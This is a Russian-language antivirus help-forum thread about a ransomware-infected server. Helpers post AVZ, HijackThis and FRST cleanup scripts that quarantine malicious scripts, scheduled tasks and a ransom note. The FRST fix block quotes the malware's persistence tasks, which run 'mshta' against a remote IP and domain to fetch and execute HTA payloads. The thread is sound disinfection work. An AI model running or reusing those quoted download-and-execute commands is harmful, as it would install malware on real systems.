Перейти к содержанию

Рекомендуемые сообщения

Опубликовано (изменено)

Здравствуйте, зашифрованы файлы на сервере. Интересует возможность восстановления/дешифрации файлов.

Логи согласно правилам оформления запроса о помощи во вложении.

CollectionLog-2019.02.25-18.21.zip

Изменено пользователем G1ueck
Опубликовано

Здравствуйте!

 

Интересует возможность восстановления/дешифрации файлов

К сожалению, у нас такой возможности нет.

 

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\User3\AppData\Roaming\Microsoft\del.ps1', '');
 QuarantineFile('C:\Users\User3\AppData\Roaming\Microsoft\Network\PrivFalse.bat', '');
 DeleteSchedulerTask('OneDrive Sync');
 DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037');
 DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1137');
 DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237');
 DeleteSchedulerTask('Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337');
 DeleteFile('C:\Users\User3\AppData\Roaming\Microsoft\del.ps1', '64');
 DeleteFile('C:\Users\User3\AppData\Roaming\Microsoft\Network\PrivFalse.bat', '64');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
end.
Пожалуйста, перезагрузите компьютер вручную.

 

 

 

 

Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN).

 

 

 

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.

Прикрепите к следующему сообщению свежий CollectionLog.

Опубликовано

 

Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN).

 

 

 

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.

Прикрепите к следующему сообщению свежий CollectionLog.

 

 

KLAN-9680568597

В антивирусных базах информация по присланным вами файлам отсутствует:

del.ps1

 

Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.

CollectionLog-2019.02.27-11.08.zip

Опубликовано

"Пофиксите" в HijackThis:

O1 - Hosts: Reset contents to default
O4 - Startup other users: C:\Users\User3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_RETURN_FILES.txt
O4 - Startup other users: C:\Users\User7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\abb278f5f94f5be17c28e4761048b650.exe    ->    (PE EXE)

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

Опубликовано

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:

    Start::
    GroupPolicy: Restriction ? <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    Task: {5D0E0807-9631-41BF-AC21-C10BCD3BD88E} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037 => C:\Windows\System32\cmd.exe /c mshta hxxp://107.181.160.197/win/checking.hta <==== ATTENTION
    Task: {B4CFD127-2AA4-4296-8433-6CC33A7129B5} - System32\Tasks\Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137 => C:\Windows\System32\cmd.exe /c mshta hxxp://asq.r77vh0.pw/win/checking.hta <==== ATTENTION
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Перезагрузите компьютер вручную.

 

Подробнее читайте в этом руководстве.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Андрей2029
      Автор Андрей2029
      Добрый день. С недавнего времени каждый день по несколько раз за день вижу такое окно.
      Если добавить в исключение, окно вылазит снова на следующий день. Если разорвать соединение, таких окон вылазит несколько штук и ситуация повторяется в этот же день или на следующий. 
      Почему сервисы Adobe вдруг стали не милы Касперскому и как ситуацию исправить?
       

    • Андрей2029
      Автор Андрей2029
      Добрый день. С нредавних пор, порядка месяца постоянно вижу вот такие сообщения:

      Каждый раз новый адрес и порт, но все это касается только Adobe. Разумеется. в системе стоит лицензионный пакет Adobe Creative Cloud с набором софта, и разумеется, в исключения я все добавлял и ни раз. Каждый день, несколько раз за день вижу эти окошки. Можно как-то такое поведение Касперского Плюс изменить, ибо дастало?
    • Ser25
      Автор Ser25
      Взломали пароль и зашифровали удаленный комп. Пока ничего не предпринимал
      20250507.7z
    • Пользователь 1551
      Автор Пользователь 1551
      Добрый день! У нас аналогичная ситуация? Удалось расшифровать?
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
    • Thunderer
      Автор Thunderer
      Зашифровали файлы на компьютере и все общие папки 
      Подключились к компьютеру по RDP 
      В архиве логи frst, зашифрованный и расшифрованный файлы
      -Файлы.zip
×
×
  • Создать...